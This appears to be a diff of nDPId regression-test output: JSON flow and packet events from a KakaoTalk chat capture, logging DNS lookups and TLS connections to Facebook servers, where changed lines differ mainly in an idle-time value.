{"version":"TLSv1.2","client_requested_server_name":"api.facebook.com","ja3":"051d20e8adbe8dac78945de300764d5e","ja3s":"6806b8fe92d7d465715d771eb102ff04","unsafe_cipher":0,"cipher":"TLS_ECDHE_ECDSA_WITH_AES_128_GCM_SHA256"}} +01822{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":115,"source":"KakaoTalk_chat.pcap","alias":"nDPId-test","flow_id":24,"flow_state":"info","flow_packets_processed":10,"flow_first_seen":1430069030751,"flow_last_seen":1430069031013,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1388,"flow_tot_l4_payload_len":4134,"flow_avg_l4_payload_len":413,"midstream":0,"thread_ts_msec":1430069031013,"l3_proto":"ip4","src_ip":"10.24.82.188","dst_ip":"31.13.68.84","src_port":45209,"dst_port":443,"l4_proto":"tcp","ndpi": {"flow_risk": {"15": {"risk":"TLS (probably) Not Carrying HTTPS","severity":"Low","risk_score": {"total":760,"client":680,"server":80}}},"confidence": {"4":"DPI"},"proto":"TLS.Facebook","breed":"Fun","category":"SocialNetwork"},"tls": {"version":"TLSv1.2","client_requested_server_name":"api.facebook.com","server_names":"*.facebook.com,facebook.com,*.fbsbx.com,*.fbcdn.net,*.xx.fbcdn.net,*.xy.fbcdn.net,fb.com,*.fb.com,*.facebookcorewwwi.onion,facebookcorewwwi.onion,*.fbcdn23dssr3jqnq.onion,fbcdn23dssr3jqnq.onion,*.fbsbx2q4mvcl63pw.onion,fbsbx2q4mvcl63pw.onion,*.m.facebook.com,*.messenger.com,messenger.com,*.m.facebookcorewwwi.onion,*.xx.fbcdn23dssr3jqnq.onion,xx.fbcdn23dssr3jqnq.onion,*.xy.fbcdn23dssr3jqnq.onion,xy.fbcdn23dssr3jqnq.onion,*.xz.fbcdn.net,xz.fbcdn.net,*.xz.fbcdn23dssr3jqnq.onion,xz.fbcdn23dssr3jqnq.onion,m.facebookcorewwwi.onion","ja3":"051d20e8adbe8dac78945de300764d5e","ja3s":"6806b8fe92d7d465715d771eb102ff04","unsafe_cipher":0,"cipher":"TLS_ECDHE_ECDSA_WITH_AES_128_GCM_SHA256","issuerDN":"C=US, O=DigiCert Inc, OU=www.digicert.com, CN=DigiCert High Assurance CA-3","subjectDN":"C=US, ST=CA, L=Menlo Park, O=Facebook, Inc., 
CN=*.facebook.com","fingerprint":"A4:FB:65:F8:A1:57:FE:0D:C0:17:C1:B5:51:62:63:3A:18:73:A0:B4"}} 00572{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":117,"source":"KakaoTalk_chat.pcap","alias":"nDPId-test","flow_id":25,"flow_packet_id":2,"flow_last_seen":1430069031017,"flow_idle_time":180000,"pkt_oversize":false,"pkt_caplen":138,"pkt_type":2048,"pkt_l3_offset":16,"pkt_l4_offset":36,"pkt_len":138,"pkt_l4_len":102,"thread_ts_msec":1430069031017,"pkt":"AAACEgAAAAAAAAAAAAAIAEUAAHocCwAANREA2Aq8AQEKGFK8ADVMfgBmmjSqh4GAAAEAAwAAAAAFZ3JhcGgIZmFjZWJvb2sDY29tAAABAAHADAAFAAEAAAVxAAYDYXBpwBLAMAAFAAEAAAV2AAwEc3RhcgRjMTBywBLAQgABAAEAAAARAAQfDURG"} 00797{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":117,"source":"KakaoTalk_chat.pcap","alias":"nDPId-test","flow_id":25,"flow_state":"info","flow_packets_processed":2,"flow_first_seen":1430069030978,"flow_last_seen":1430069031017,"flow_idle_time":180000,"flow_min_l4_payload_len":36,"flow_max_l4_payload_len":94,"flow_tot_l4_payload_len":130,"flow_avg_l4_payload_len":65,"midstream":0,"thread_ts_msec":1430069031017,"l3_proto":"ip4","src_ip":"10.24.82.188","dst_ip":"10.188.1.1","src_port":19582,"dst_port":53,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"DNS.Facebook","breed":"Fun","category":"SocialNetwork"},"dns": {"query":"graph.facebook.com","num_queries":1,"num_answers":3,"reply_code":0,"query_type":1,"rsp_type":1,"rsp_addr":"31.13.68.70"}} 
-00585{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":119,"source":"KakaoTalk_chat.pcap","alias":"nDPId-test","flow_id":26,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1430069031042,"flow_last_seen":1430069031042,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1430069031042,"l3_proto":"ip4","src_ip":"10.24.82.188","dst_ip":"31.13.68.70","src_port":43581,"dst_port":443,"l4_proto":"tcp","flow_datalink":113,"flow_max_packets":3} -00490{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":119,"source":"KakaoTalk_chat.pcap","alias":"nDPId-test","flow_id":26,"flow_packet_id":1,"flow_last_seen":1430069031042,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":76,"pkt_type":2048,"pkt_l3_offset":16,"pkt_l4_offset":36,"pkt_len":76,"pkt_l4_len":40,"thread_ts_msec":1430069031042,"pkt":"AAQCEgAAAAAAAAAAAAAIAEUAADx6qUAAPwYA7AoYUrwfDURGqj0Bu4p9cZMAAAAAoAI5CJu+AAACBAV4BAIICgALCzoAAAAAAQMDBw=="} -00466{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":121,"source":"KakaoTalk_chat.pcap","alias":"nDPId-test","flow_id":26,"flow_packet_id":2,"flow_last_seen":1430069031079,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":60,"pkt_type":2048,"pkt_l3_offset":16,"pkt_l4_offset":36,"pkt_len":60,"pkt_l4_len":24,"thread_ts_msec":1430069031079,"pkt":"AAACEgAAAAAAAAAAAAAIAEUAACwwtUAA+AaR7x8NREYKGFK8AbuqPWAZ05aKfXGUYBIRHOtUAAACBAV4"} 
-00463{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":122,"source":"KakaoTalk_chat.pcap","alias":"nDPId-test","flow_id":26,"flow_packet_id":3,"flow_last_seen":1430069031083,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":56,"pkt_type":2048,"pkt_l3_offset":16,"pkt_l4_offset":36,"pkt_len":56,"pkt_l4_len":20,"thread_ts_msec":1430069031083,"pkt":"AAQCEgAAAAAAAAAAAAAIAEUAACh6qkAAPwYA\/woYUrwfDURGqj0Bu4p9cZRgGdOXUBA5CNrpAAA="} -00976{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":123,"source":"KakaoTalk_chat.pcap","alias":"nDPId-test","flow_id":26,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1430069031042,"flow_last_seen":1430069031083,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":565,"flow_tot_l4_payload_len":565,"flow_avg_l4_payload_len":141,"midstream":0,"thread_ts_msec":1430069031083,"l3_proto":"ip4","src_ip":"10.24.82.188","dst_ip":"31.13.68.70","src_port":43581,"dst_port":443,"l4_proto":"tcp","ndpi": {"flow_risk": {"15": {"risk":"TLS (probably) Not Carrying HTTPS","severity":"Low","risk_score": {"total":760,"client":680,"server":80}}},"confidence": {"4":"DPI"},"proto":"TLS.Facebook","breed":"Fun","category":"SocialNetwork"},"tls": {"version":"TLSv1.2","client_requested_server_name":"graph.facebook.com","ja3":"051d20e8adbe8dac78945de300764d5e","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL"}} 
+00585{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":119,"source":"KakaoTalk_chat.pcap","alias":"nDPId-test","flow_id":26,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1430069031042,"flow_last_seen":1430069031042,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1430069031042,"l3_proto":"ip4","src_ip":"10.24.82.188","dst_ip":"31.13.68.70","src_port":43581,"dst_port":443,"l4_proto":"tcp","flow_datalink":113,"flow_max_packets":3} +00490{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":119,"source":"KakaoTalk_chat.pcap","alias":"nDPId-test","flow_id":26,"flow_packet_id":1,"flow_last_seen":1430069031042,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":76,"pkt_type":2048,"pkt_l3_offset":16,"pkt_l4_offset":36,"pkt_len":76,"pkt_l4_len":40,"thread_ts_msec":1430069031042,"pkt":"AAQCEgAAAAAAAAAAAAAIAEUAADx6qUAAPwYA7AoYUrwfDURGqj0Bu4p9cZMAAAAAoAI5CJu+AAACBAV4BAIICgALCzoAAAAAAQMDBw=="} +00466{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":121,"source":"KakaoTalk_chat.pcap","alias":"nDPId-test","flow_id":26,"flow_packet_id":2,"flow_last_seen":1430069031079,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":60,"pkt_type":2048,"pkt_l3_offset":16,"pkt_l4_offset":36,"pkt_len":60,"pkt_l4_len":24,"thread_ts_msec":1430069031079,"pkt":"AAACEgAAAAAAAAAAAAAIAEUAACwwtUAA+AaR7x8NREYKGFK8AbuqPWAZ05aKfXGUYBIRHOtUAAACBAV4"} 
+00463{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":122,"source":"KakaoTalk_chat.pcap","alias":"nDPId-test","flow_id":26,"flow_packet_id":3,"flow_last_seen":1430069031083,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":56,"pkt_type":2048,"pkt_l3_offset":16,"pkt_l4_offset":36,"pkt_len":56,"pkt_l4_len":20,"thread_ts_msec":1430069031083,"pkt":"AAQCEgAAAAAAAAAAAAAIAEUAACh6qkAAPwYA\/woYUrwfDURGqj0Bu4p9cZRgGdOXUBA5CNrpAAA="} +00976{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":123,"source":"KakaoTalk_chat.pcap","alias":"nDPId-test","flow_id":26,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1430069031042,"flow_last_seen":1430069031083,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":565,"flow_tot_l4_payload_len":565,"flow_avg_l4_payload_len":141,"midstream":0,"thread_ts_msec":1430069031083,"l3_proto":"ip4","src_ip":"10.24.82.188","dst_ip":"31.13.68.70","src_port":43581,"dst_port":443,"l4_proto":"tcp","ndpi": {"flow_risk": {"15": {"risk":"TLS (probably) Not Carrying HTTPS","severity":"Low","risk_score": {"total":760,"client":680,"server":80}}},"confidence": {"4":"DPI"},"proto":"TLS.Facebook","breed":"Fun","category":"SocialNetwork"},"tls": {"version":"TLSv1.2","client_requested_server_name":"graph.facebook.com","ja3":"051d20e8adbe8dac78945de300764d5e","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL"}} 
00585{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":127,"source":"KakaoTalk_chat.pcap","alias":"nDPId-test","flow_id":27,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1430069031167,"flow_last_seen":1430069031167,"flow_idle_time":180000,"flow_min_l4_payload_len":41,"flow_max_l4_payload_len":41,"flow_tot_l4_payload_len":41,"flow_avg_l4_payload_len":41,"midstream":0,"thread_ts_msec":1430069031167,"l3_proto":"ip4","src_ip":"10.24.82.188","dst_ip":"10.188.1.1","src_port":4017,"dst_port":53,"l4_proto":"udp","flow_datalink":113,"flow_max_packets":3} 00502{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":127,"source":"KakaoTalk_chat.pcap","alias":"nDPId-test","flow_id":27,"flow_packet_id":1,"flow_last_seen":1430069031167,"flow_idle_time":180000,"pkt_oversize":false,"pkt_caplen":85,"pkt_type":2048,"pkt_l3_offset":16,"pkt_l4_offset":36,"pkt_len":85,"pkt_l4_len":49,"thread_ts_msec":1430069031167,"pkt":"AAQCEgAAAAAAAAAAAAAIAEUAAEUAAEAAQBHSFwoYUrwKvAEBD7EANQAxznCJ\/wEAAAEAAAAAAAAKZGV2ZWxvcGVycwhmYWNlYm9vawNjb20AAAEAAQ=="} 00788{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":127,"source":"KakaoTalk_chat.pcap","alias":"nDPId-test","flow_id":27,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1430069031167,"flow_last_seen":1430069031167,"flow_idle_time":180000,"flow_min_l4_payload_len":41,"flow_max_l4_payload_len":41,"flow_tot_l4_payload_len":41,"flow_avg_l4_payload_len":41,"midstream":0,"thread_ts_msec":1430069031167,"l3_proto":"ip4","src_ip":"10.24.82.188","dst_ip":"10.188.1.1","src_port":4017,"dst_port":53,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"DNS.Facebook","breed":"Fun","category":"SocialNetwork"},"dns": {"query":"developers.facebook.com","num_queries":0,"num_answers":0,"reply_code":0,"query_type":1,"rsp_type":0,"rsp_addr":"0.0.0.0"}} 
-01034{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":132,"source":"KakaoTalk_chat.pcap","alias":"nDPId-test","flow_id":26,"flow_state":"info","flow_packets_processed":7,"flow_first_seen":1430069031042,"flow_last_seen":1430069031203,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1280,"flow_tot_l4_payload_len":1845,"flow_avg_l4_payload_len":263,"midstream":0,"thread_ts_msec":1430069031203,"l3_proto":"ip4","src_ip":"10.24.82.188","dst_ip":"31.13.68.70","src_port":43581,"dst_port":443,"l4_proto":"tcp","ndpi": {"flow_risk": {"15": {"risk":"TLS (probably) Not Carrying HTTPS","severity":"Low","risk_score": {"total":760,"client":680,"server":80}}},"confidence": {"4":"DPI"},"proto":"TLS.Facebook","breed":"Fun","category":"SocialNetwork"},"tls": {"version":"TLSv1.2","client_requested_server_name":"graph.facebook.com","ja3":"051d20e8adbe8dac78945de300764d5e","ja3s":"6806b8fe92d7d465715d771eb102ff04","unsafe_cipher":0,"cipher":"TLS_ECDHE_ECDSA_WITH_AES_128_GCM_SHA256"}} -01824{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":138,"source":"KakaoTalk_chat.pcap","alias":"nDPId-test","flow_id":26,"flow_state":"info","flow_packets_processed":12,"flow_first_seen":1430069031042,"flow_last_seen":1430069031220,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1280,"flow_tot_l4_payload_len":4136,"flow_avg_l4_payload_len":344,"midstream":0,"thread_ts_msec":1430069031220,"l3_proto":"ip4","src_ip":"10.24.82.188","dst_ip":"31.13.68.70","src_port":43581,"dst_port":443,"l4_proto":"tcp","ndpi": {"flow_risk": {"15": {"risk":"TLS (probably) Not Carrying HTTPS","severity":"Low","risk_score": {"total":760,"client":680,"server":80}}},"confidence": {"4":"DPI"},"proto":"TLS.Facebook","breed":"Fun","category":"SocialNetwork"},"tls": 
{"version":"TLSv1.2","client_requested_server_name":"graph.facebook.com","server_names":"*.facebook.com,facebook.com,*.fbsbx.com,*.fbcdn.net,*.xx.fbcdn.net,*.xy.fbcdn.net,fb.com,*.fb.com,*.facebookcorewwwi.onion,facebookcorewwwi.onion,*.fbcdn23dssr3jqnq.onion,fbcdn23dssr3jqnq.onion,*.fbsbx2q4mvcl63pw.onion,fbsbx2q4mvcl63pw.onion,*.m.facebook.com,*.messenger.com,messenger.com,*.m.facebookcorewwwi.onion,*.xx.fbcdn23dssr3jqnq.onion,xx.fbcdn23dssr3jqnq.onion,*.xy.fbcdn23dssr3jqnq.onion,xy.fbcdn23dssr3jqnq.onion,*.xz.fbcdn.net,xz.fbcdn.net,*.xz.fbcdn23dssr3jqnq.onion,xz.fbcdn23dssr3jqnq.onion,m.facebookcorewwwi.onion","ja3":"051d20e8adbe8dac78945de300764d5e","ja3s":"6806b8fe92d7d465715d771eb102ff04","unsafe_cipher":0,"cipher":"TLS_ECDHE_ECDSA_WITH_AES_128_GCM_SHA256","issuerDN":"C=US, O=DigiCert Inc, OU=www.digicert.com, CN=DigiCert High Assurance CA-3","subjectDN":"C=US, ST=CA, L=Menlo Park, O=Facebook, Inc., CN=*.facebook.com","fingerprint":"A4:FB:65:F8:A1:57:FE:0D:C0:17:C1:B5:51:62:63:3A:18:73:A0:B4"}} +01034{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":132,"source":"KakaoTalk_chat.pcap","alias":"nDPId-test","flow_id":26,"flow_state":"info","flow_packets_processed":7,"flow_first_seen":1430069031042,"flow_last_seen":1430069031203,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1280,"flow_tot_l4_payload_len":1845,"flow_avg_l4_payload_len":263,"midstream":0,"thread_ts_msec":1430069031203,"l3_proto":"ip4","src_ip":"10.24.82.188","dst_ip":"31.13.68.70","src_port":43581,"dst_port":443,"l4_proto":"tcp","ndpi": {"flow_risk": {"15": {"risk":"TLS (probably) Not Carrying HTTPS","severity":"Low","risk_score": {"total":760,"client":680,"server":80}}},"confidence": {"4":"DPI"},"proto":"TLS.Facebook","breed":"Fun","category":"SocialNetwork"},"tls": 
{"version":"TLSv1.2","client_requested_server_name":"graph.facebook.com","ja3":"051d20e8adbe8dac78945de300764d5e","ja3s":"6806b8fe92d7d465715d771eb102ff04","unsafe_cipher":0,"cipher":"TLS_ECDHE_ECDSA_WITH_AES_128_GCM_SHA256"}} +01824{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":138,"source":"KakaoTalk_chat.pcap","alias":"nDPId-test","flow_id":26,"flow_state":"info","flow_packets_processed":12,"flow_first_seen":1430069031042,"flow_last_seen":1430069031220,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1280,"flow_tot_l4_payload_len":4136,"flow_avg_l4_payload_len":344,"midstream":0,"thread_ts_msec":1430069031220,"l3_proto":"ip4","src_ip":"10.24.82.188","dst_ip":"31.13.68.70","src_port":43581,"dst_port":443,"l4_proto":"tcp","ndpi": {"flow_risk": {"15": {"risk":"TLS (probably) Not Carrying HTTPS","severity":"Low","risk_score": {"total":760,"client":680,"server":80}}},"confidence": {"4":"DPI"},"proto":"TLS.Facebook","breed":"Fun","category":"SocialNetwork"},"tls": {"version":"TLSv1.2","client_requested_server_name":"graph.facebook.com","server_names":"*.facebook.com,facebook.com,*.fbsbx.com,*.fbcdn.net,*.xx.fbcdn.net,*.xy.fbcdn.net,fb.com,*.fb.com,*.facebookcorewwwi.onion,facebookcorewwwi.onion,*.fbcdn23dssr3jqnq.onion,fbcdn23dssr3jqnq.onion,*.fbsbx2q4mvcl63pw.onion,fbsbx2q4mvcl63pw.onion,*.m.facebook.com,*.messenger.com,messenger.com,*.m.facebookcorewwwi.onion,*.xx.fbcdn23dssr3jqnq.onion,xx.fbcdn23dssr3jqnq.onion,*.xy.fbcdn23dssr3jqnq.onion,xy.fbcdn23dssr3jqnq.onion,*.xz.fbcdn.net,xz.fbcdn.net,*.xz.fbcdn23dssr3jqnq.onion,xz.fbcdn23dssr3jqnq.onion,m.facebookcorewwwi.onion","ja3":"051d20e8adbe8dac78945de300764d5e","ja3s":"6806b8fe92d7d465715d771eb102ff04","unsafe_cipher":0,"cipher":"TLS_ECDHE_ECDSA_WITH_AES_128_GCM_SHA256","issuerDN":"C=US, O=DigiCert Inc, OU=www.digicert.com, CN=DigiCert High Assurance CA-3","subjectDN":"C=US, ST=CA, L=Menlo Park, O=Facebook, Inc., 
CN=*.facebook.com","fingerprint":"A4:FB:65:F8:A1:57:FE:0D:C0:17:C1:B5:51:62:63:3A:18:73:A0:B4"}} 00581{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":139,"source":"KakaoTalk_chat.pcap","alias":"nDPId-test","flow_id":27,"flow_packet_id":2,"flow_last_seen":1430069031221,"flow_idle_time":180000,"pkt_oversize":false,"pkt_caplen":144,"pkt_type":2048,"pkt_l3_offset":16,"pkt_l4_offset":36,"pkt_len":144,"pkt_l4_len":108,"thread_ts_msec":1430069031221,"pkt":"AAACEgAAAAAAAAAAAAAIAEUAAIDtrgAANREvLgq8AQEKGFK8ADUPsQBsjjKJ\/4GAAAEAAwAAAAAKZGV2ZWxvcGVycwhmYWNlYm9vawNjb20AAAEAAcAMAAUAAQAAA+oABwRzdGFywBfANQAFAAEAAAPqAAwEc3RhcgRjMTBywBfASAABAAEAAAAIAAQfDURU"} 00802{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":139,"source":"KakaoTalk_chat.pcap","alias":"nDPId-test","flow_id":27,"flow_state":"info","flow_packets_processed":2,"flow_first_seen":1430069031167,"flow_last_seen":1430069031221,"flow_idle_time":180000,"flow_min_l4_payload_len":41,"flow_max_l4_payload_len":100,"flow_tot_l4_payload_len":141,"flow_avg_l4_payload_len":70,"midstream":0,"thread_ts_msec":1430069031221,"l3_proto":"ip4","src_ip":"10.24.82.188","dst_ip":"10.188.1.1","src_port":4017,"dst_port":53,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"DNS.Facebook","breed":"Fun","category":"SocialNetwork"},"dns": {"query":"developers.facebook.com","num_queries":1,"num_answers":3,"reply_code":0,"query_type":1,"rsp_type":1,"rsp_addr":"31.13.68.84"}} 
00586{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":144,"source":"KakaoTalk_chat.pcap","alias":"nDPId-test","flow_id":28,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1430069031230,"flow_last_seen":1430069031230,"flow_idle_time":180000,"flow_min_l4_payload_len":43,"flow_max_l4_payload_len":43,"flow_tot_l4_payload_len":43,"flow_avg_l4_payload_len":43,"midstream":0,"thread_ts_msec":1430069031230,"l3_proto":"ip4","src_ip":"10.24.82.188","dst_ip":"10.188.1.1","src_port":14650,"dst_port":53,"l4_proto":"udp","flow_datalink":113,"flow_max_packets":3} 00501{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":144,"source":"KakaoTalk_chat.pcap","alias":"nDPId-test","flow_id":28,"flow_packet_id":1,"flow_last_seen":1430069031230,"flow_idle_time":180000,"pkt_oversize":false,"pkt_caplen":87,"pkt_type":2048,"pkt_l3_offset":16,"pkt_l4_offset":36,"pkt_len":87,"pkt_l4_len":51,"thread_ts_msec":1430069031230,"pkt":"AAQCEgAAAAAAAAAAAAAIAEUAAEcAAEAAQBHSFQoYUrwKvAEBOToANQAzWvOyogEAAAEAAAAAAAABMgI5NwMyNTIDMTczB2luLWFkZHIEYXJwYQAADAAB"} 00784{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":144,"source":"KakaoTalk_chat.pcap","alias":"nDPId-test","flow_id":28,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1430069031230,"flow_last_seen":1430069031230,"flow_idle_time":180000,"flow_min_l4_payload_len":43,"flow_max_l4_payload_len":43,"flow_tot_l4_payload_len":43,"flow_avg_l4_payload_len":43,"midstream":0,"thread_ts_msec":1430069031230,"l3_proto":"ip4","src_ip":"10.24.82.188","dst_ip":"10.188.1.1","src_port":14650,"dst_port":53,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"DNS","breed":"Acceptable","category":"Network"},"dns": {"query":"2.97.252.173.in-addr.arpa","num_queries":0,"num_answers":0,"reply_code":0,"query_type":12,"rsp_type":0,"rsp_addr":"0.0.0.0"}} 
-00585{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":146,"source":"KakaoTalk_chat.pcap","alias":"nDPId-test","flow_id":29,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1430069031236,"flow_last_seen":1430069031236,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1430069031236,"l3_proto":"ip4","src_ip":"10.24.82.188","dst_ip":"31.13.68.84","src_port":45211,"dst_port":443,"l4_proto":"tcp","flow_datalink":113,"flow_max_packets":3} -00490{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":146,"source":"KakaoTalk_chat.pcap","alias":"nDPId-test","flow_id":29,"flow_packet_id":1,"flow_last_seen":1430069031236,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":76,"pkt_type":2048,"pkt_l3_offset":16,"pkt_l4_offset":36,"pkt_len":76,"pkt_l4_len":40,"thread_ts_msec":1430069031236,"pkt":"AAQCEgAAAAAAAAAAAAAIAEUAADxjDkAAPwYYeQoYUrwfDURUsJsBu8tPaEMAAAAAoAI5CF29AAACBAV4BAIICgALC00AAAAAAQMDBw=="} +00585{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":146,"source":"KakaoTalk_chat.pcap","alias":"nDPId-test","flow_id":29,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1430069031236,"flow_last_seen":1430069031236,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1430069031236,"l3_proto":"ip4","src_ip":"10.24.82.188","dst_ip":"31.13.68.84","src_port":45211,"dst_port":443,"l4_proto":"tcp","flow_datalink":113,"flow_max_packets":3} 
+00490{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":146,"source":"KakaoTalk_chat.pcap","alias":"nDPId-test","flow_id":29,"flow_packet_id":1,"flow_last_seen":1430069031236,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":76,"pkt_type":2048,"pkt_l3_offset":16,"pkt_l4_offset":36,"pkt_len":76,"pkt_l4_len":40,"thread_ts_msec":1430069031236,"pkt":"AAQCEgAAAAAAAAAAAAAIAEUAADxjDkAAPwYYeQoYUrwfDURUsJsBu8tPaEMAAAAAoAI5CF29AAACBAV4BAIICgALC00AAAAAAQMDBw=="} 00563{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":147,"source":"KakaoTalk_chat.pcap","alias":"nDPId-test","flow_id":28,"flow_packet_id":2,"flow_last_seen":1430069031281,"flow_idle_time":180000,"pkt_oversize":false,"pkt_caplen":130,"pkt_type":2048,"pkt_l3_offset":16,"pkt_l4_offset":36,"pkt_len":130,"pkt_l4_len":94,"thread_ts_msec":1430069031281,"pkt":"AAACEgAAAAAAAAAAAAAIAEUAAHLtrwAANREvOwq8AQEKGFK8ADU5OgBeI2eyooGAAAEAAQAAAAABMgI5NwMyNTIDMTczB2luLWFkZHIEYXJwYQAADAABwAwADAABAAAEYQAfEG1xdHQtc2h2LTE0LWZyYzEIZmFjZWJvb2sDY29tAA=="} 00794{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":147,"source":"KakaoTalk_chat.pcap","alias":"nDPId-test","flow_id":28,"flow_state":"info","flow_packets_processed":2,"flow_first_seen":1430069031230,"flow_last_seen":1430069031281,"flow_idle_time":180000,"flow_min_l4_payload_len":43,"flow_max_l4_payload_len":86,"flow_tot_l4_payload_len":129,"flow_avg_l4_payload_len":64,"midstream":0,"thread_ts_msec":1430069031281,"l3_proto":"ip4","src_ip":"10.24.82.188","dst_ip":"10.188.1.1","src_port":14650,"dst_port":53,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"DNS","breed":"Acceptable","category":"Network"},"dns": {"query":"2.97.252.173.in-addr.arpa","num_queries":1,"num_answers":1,"reply_code":0,"query_type":12,"rsp_type":12,"rsp_addr":"0.0.0.0"}} 
-00466{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":148,"source":"KakaoTalk_chat.pcap","alias":"nDPId-test","flow_id":29,"flow_packet_id":2,"flow_last_seen":1430069031281,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":60,"pkt_type":2048,"pkt_l3_offset":16,"pkt_l4_offset":36,"pkt_len":60,"pkt_l4_len":24,"thread_ts_msec":1430069031281,"pkt":"AAACEgAAAAAAAAAAAAAIAEUAACw2WEAA+AaMPh8NRFQKGFK8Abuwm2JwnlDLT2hEYBIRHOBVAAACBAV4"} -00463{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":149,"source":"KakaoTalk_chat.pcap","alias":"nDPId-test","flow_id":29,"flow_packet_id":3,"flow_last_seen":1430069031284,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":56,"pkt_type":2048,"pkt_l3_offset":16,"pkt_l4_offset":36,"pkt_len":56,"pkt_l4_len":20,"thread_ts_msec":1430069031284,"pkt":"AAQCEgAAAAAAAAAAAAAIAEUAAChjD0AAPwYYjAoYUrwfDURUsJsBu8tPaERicJ5RUBA5CM\/qAAA="} -00981{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":150,"source":"KakaoTalk_chat.pcap","alias":"nDPId-test","flow_id":29,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1430069031236,"flow_last_seen":1430069031286,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":570,"flow_tot_l4_payload_len":570,"flow_avg_l4_payload_len":142,"midstream":0,"thread_ts_msec":1430069031286,"l3_proto":"ip4","src_ip":"10.24.82.188","dst_ip":"31.13.68.84","src_port":45211,"dst_port":443,"l4_proto":"tcp","ndpi": {"flow_risk": {"15": {"risk":"TLS (probably) Not Carrying 